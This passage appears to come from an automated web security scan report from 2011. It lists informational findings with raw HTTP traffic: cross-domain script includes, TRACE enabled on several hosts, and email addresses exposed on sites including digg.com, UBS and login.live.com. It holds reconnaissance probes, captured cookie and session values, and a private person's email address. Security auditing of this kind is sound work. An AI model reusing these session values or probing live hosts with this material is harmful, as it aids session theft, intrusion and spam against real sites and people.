GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.37. http://malsup.com/jquery/cycle/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/cycle/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js
http://malsup.github.com/chili-1.7.pack.js
http://malsup.github.com/jquery.cycle.all.js
http://malsup.github.com/jquery.easing.1.3.js
http://www.google-analytics.com/urchin.js

Request

GET /jquery/cycle/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:26 GMT
Server: mod_security2/2.5.7
Last-Modified: Mon, 09 May 2011 12:21:31 GMT
ETag: "10cdf89-1efb-4a2d6e12768c0"
Accept-Ranges: bytes
Content-Length: 7931
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.cycle.all.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.easing.1.3.js"></script>
<script type="text/javascript" src="http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.38. http://medienfreunde.com/lab/innerfade/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://medienfreunde.com
Path:	/lab/innerfade/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">

   <hea
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...
</script>
                   <script type="text/javascript"
                    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...
</script>
   <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
   </script>
...[SNIP]...
</script>
   <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
   </script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...

16.39. http://pubads.g.doubleclick.net/gampad/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/gampad/ads

Issue detail

The response dynamically includes the following script from another domain:

http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2800593&PluID=0&w=300&h=250&ncu=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBaHBaQUUUTqvdE5LslQeKyOj8D63mhMIBo5ejqBCFk__xOwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0xNzY3NDYzNTAzNTIwODY3oAGrl7rtA7IBDHd3dy5iZWJvLmNvbboBCjMwMHgyNTBfYXPIAQnaARRodHRwOi8vd3d3LmJlYm8uY29tL5gCyhHAAgXIApWysAvgAgDqAhpCZWJvX0hvbWVfMzAweDI1MF9BVEZSaWdodKgDAegDwgToA9MB6AP4A_UDAACAweAEAYAGz6SZ7NvQ-unMAQ%26num%3D1%26sig%3DAGiWqty8BvNy85dWZZPNztI-FtGBFXWVVg%26client%3Dca-pub-1767463503520867%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1byw2Ns0IjI43jQ_2znd1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgDDUBk0%2526redirectURL%253D&ord=ThRFQQAE7qsK5XYS_5okCg==&ucm=true

Request

Response

16.40. http://pubads.g.doubleclick.net/gampad/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/gampad/ads

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/js/r20110622/r20110627/abg.js

Request

Response

17. TRACE method is enabled previous next
There are 4 instances of this issue:

http://bp.specificclick.net/
http://cdn1.diggstatic.com/
http://crl.globalsign.net/
http://digg.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

17.1. http://bp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/

Request

TRACE / HTTP/1.0
Host: bp.specificclick.net
Cookie: 50e06ad4db9bac49

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 88
Date: Wed, 06 Jul 2011 15:39:03 GMT
Connection: close

TRACE / HTTP/1.0
host: bp.specificclick.net
cookie: 50e06ad4db9bac49; ADVIVA=NOTRACK

17.2. http://cdn1.diggstatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn1.diggstatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: cdn1.diggstatic.com
Cookie: dd3b41a62c600328

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:22 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: dd3b41a62c600328
Accept-Encoding: gzip
Host: media.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.140.5
x-chpd-loop: 1
Via: 1.0 PXY029-ASHB.COTENDO.NET (chpd/4.01.0008.8)
Cneoncti
...[SNIP]...

17.3. http://crl.globalsign.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://crl.globalsign.net
Path:	/

Request

TRACE / HTTP/1.0
Host: crl.globalsign.net
Cookie: f78f2f6839dcb285

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:21:34 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: crl.globalsign.net
Cookie: f78f2f6839dcb285

17.4. http://digg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/

Request

TRACE / HTTP/1.0
Host: digg.com
Cookie: 5362da617c8da351

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:14 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: digg.com
Cookie: 5362da617c8da351; traffic_control=f04100000060110000168986608%3A219%3A112; d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2
Connection: Keep-Alive
X-forwarded-for: 173.193.214.243

18. Email addresses disclosed previous next
There are 26 instances of this issue:

http://about.digg.com/privacy
http://about.digg.com/terms-use
http://blogs.technet.com/b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx
http://blogs.technet.com/utility/js/omni_rsid_technet_current.js
http://bstats.adbrite.com/adserver/behavioral-data/0
http://cdn1.viximo.com/api_assets/ca02f696b/javascripts/api/v3/vixui.js
https://foton-ewm-es.ubs.com/safe-login/Login
http://jqueryui.com/about
https://login.live.com/login.srf
https://login.live.com/pp1100/
https://login.live.com/ppsecure/post.srf
https://login.live.com/ppsecure/secure.srf
https://manage.softlayer.com/
https://manage.softlayer.com/Sales/orderComputingInstance
https://manage.softlayer.com/index/index
https://msnia.login.live.com/ppsecure/post.srf
https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dna
https://onlineservices.ubs.com/olsauth/public/SE/OLS/_security.jsp
https://onlineservices.ubs.com/olsauth/public/SE/OLS/customerPrivacy37.jsp
https://onlineservices.ubs.com/olsauth/public/SE/OLS/importantLegalInformation.jsp
https://onlineservices.ubs.com/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp
https://onlineservices.ubs.com/olsauth/public/SE/OLS/onlinePrivacy37.jsp
https://onlineservices.ubs.com/olsauth/public/SE/OLS/privacyStatement37.jsp
https://onlineservices.ubs.com/olsauth/public/SE/OLS/security.jsp
https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html
http://s.bebo.com/js/mootools-core-and-more-1.3.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

18.1. http://about.digg.com/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://about.digg.com
Path:	/privacy

Issue detail

The following email address was disclosed in the response:

support@digg.com

Request

GET /privacy HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.2. http://about.digg.com/terms-use previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://about.digg.com
Path:	/terms-use

Issue detail

The following email addresses were disclosed in the response:

abuse@digg.com
support@digg.com

Request

GET /terms-use HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.3. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.technet.com
Path:	/b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx

Issue detail

The following email address was disclosed in the response:

georgejkenny@msn.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-FRAME-OPTIONS: SAMEORIGIN
Telligent-Evolution: 5.6.583.17018
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Pingback: http://blogs.technet.com/b/microsoft_on_the_issues/pingback.aspx
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Wed, 06 Jul 2011 11:21:29 GMT
Content-Length: 143939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<span class="user-name">George J. Kenny - georgejkenny@msn.com</span>
...[SNIP]...

18.4. http://blogs.technet.com/utility/js/omni_rsid_technet_current.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.technet.com
Path:	/utility/js/omni_rsid_technet_current.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /utility/js/omni_rsid_technet_current.js HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=1306444613329_0b6a_7430_ae20_acaad3f30011; mstcid=173653f; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 16 Jun 2011 17:11:42 GMT
Accept-Ranges: bytes
ETag: "0db3e76482ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-FRAME-OPTIONS: SAMEORIGIN
Telligent-Evolution: 5.6.583.17018
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
server: VBDNET09
Date: Wed, 06 Jul 2011 11:18:45 GMT
Content-Length: 73916

// for sites using analytics.aspx, update omniGuidPath with the path to the analytics.aspx file, omitting the protocol
// for blogs this should be either
// omniGuidPath : "://blogs.msdn.com/anal
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

18.5. http://bstats.adbrite.com/adserver/behavioral-data/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/adserver/behavioral-data/0

Issue detail

The following email address was disclosed in the response:

4e14819a@view.atdmt.com

Request

Response

18.6. http://cdn1.viximo.com/api_assets/ca02f696b/javascripts/api/v3/vixui.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn1.viximo.com
Path:	/api_assets/ca02f696b/javascripts/api/v3/vixui.js

Issue detail

The following email address was disclosed in the response:

support@viximo.com

Request

GET /api_assets/ca02f696b/javascripts/api/v3/vixui.js HTTP/1.1
Host: cdn1.viximo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: dAJVrn+MoCjAHvDzH2jVIa82k5Qex4cTMH8TNv/LwTPuO5EZgX6mKBHhqqsdiGOF
x-amz-request-id: 312E25C57AEA504C
Date: Wed, 06 Jul 2011 11:21:39 GMT
Last-Modified: Thu, 30 Jun 2011 17:57:01 GMT
ETag: "ed74b04ae9f165b1a323bf30a5028b63"
Accept-Ranges: bytes
Content-Type: text/javascript
Server: AmazonS3
Vary: Accept-Encoding
Cache-Control: private, max-age=604800
Age: 0
Expires: Wed, 13 Jul 2011 11:21:39 GMT
Content-Length: 1125197
Connection: Keep-Alive

viximo.jQueryInFrame=function(T){var H=T.window,L=T.setTimeout||H.setTimeout,M=T.setInterval||H.setInterval;(function(O,D){var g=O.document,K=function(){function q(){if(!y.isReady){try{g.documentEleme
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href=""mailto:support@viximo.com"">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href=\"mailto:support@viximo.com?subject=Help%20in%20{{app}}%20on%20{{publisher}}&body=%0A%0AName:%20{{name}}%0AUserid:%20{{userid}}%0ANetwork:%20{{publisher}}%0AApp:%20{{app}}\">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com?subject=Help%20in%20{{app}}%20on%20{{publisher}}&body=%0A%0AName:%20{{name}}%0AUserid:%20{{userid}}%0ANetwork:%20{{publisher}}%0AApp:%20{{app}}">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...
<a href="mailto:support@viximo.com">support@viximo.com</a>
...[SNIP]...

18.7. https://foton-ewm-es.ubs.com/safe-login/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://foton-ewm-es.ubs.com
Path:	/safe-login/Login

Issue detail

The following email address was disclosed in the response:

intermediaires.france@ubs.com

Request

GET /safe-login/Login?handler=SAFEGetLogin HTTP/1.1
Host: foton-ewm-es.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

<html>
<head>
<title>Bienvenido a UBS Bank, S.A.</title>
<meta pageName='login-Login'>
<meta serviceTime='0'>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link
...[SNIP]...
<a href='mailto:intermediaires.france@ubs.com?subject=Forgotten%20Password&body=login%20name:'>
...[SNIP]...

18.8. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The following email addresses were disclosed in the response:

contact@appendTo.com
contact@appendto.com
hello@filamentgroup.com

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15514

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

18.9. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14263
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:15:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309950978&id=73625&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-55d45d8a-4113-45e0-90d0-585f12970906; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E59 V: 0
Date: Wed, 06 Jul 2011 11:16:17 GMT
Connection: close



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...
~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!IN~India~91~^[1-9]{1}[0-9]{9}$~81234-56789~-=5!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!JO~Jordan~962~^[1-9]{1}[0-9]{8}$~7 7123 4567~=1, =5!!!KR~Korea~82~^[1-9]{1}[0-9]{8,9}$~10 1234 5678~=2, =6!!!KW~Kuwait~965~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!MY~Malaysia~60~^[1-9]{1}[0-9]{8}$~1-4234
...[SNIP]...

18.10. https://login.live.com/pp1100/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/pp1100/

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

GET /pp1100/ HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12506
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-173062aa-9edd-4769-b216-ebf691c92719; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E41 V: 0
Date: Wed, 06 Jul 2011 11:21:02 GMT
Connection: close



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...
~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!IN~India~91~^[1-9]{1}[0-9]{9}$~81234-56789~-=5!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!JO~Jordan~962~^[1-9]{1}[0-9]{8}$~7 7123 4567~=1, =5!!!KR~Korea~82~^[1-9]{1}[0-9]{8,9}$~10 1234 5678~=2, =6!!!KW~Kuwait~965~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!MY~Malaysia~60~^[1-9]{1}[0-9]{8}$~1-4234
...[SNIP]...

18.11. https://login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/post.srf

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

GET /ppsecure/post.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12542
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-f4d8415d-863c-470b-9c48-033be61fa412; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E54 V: 0
Date: Wed, 06 Jul 2011 11:21:02 GMT
Connection: close



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...
~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!IN~India~91~^[1-9]{1}[0-9]{9}$~81234-56789~-=5!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!JO~Jordan~962~^[1-9]{1}[0-9]{8}$~7 7123 4567~=1, =5!!!KR~Korea~82~^[1-9]{1}[0-9]{8,9}$~10 1234 5678~=2, =6!!!KW~Kuwait~965~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!MY~Malaysia~60~^[1-9]{1}[0-9]{8}$~1-4234
...[SNIP]...

18.12. https://login.live.com/ppsecure/secure.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/secure.srf

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

GET /ppsecure/secure.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12531
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-2f030afb-c784-4e3b-9dbe-a3f70a5aa8ef; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E32 V: 0
Date: Wed, 06 Jul 2011 11:21:03 GMT
Connection: close



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
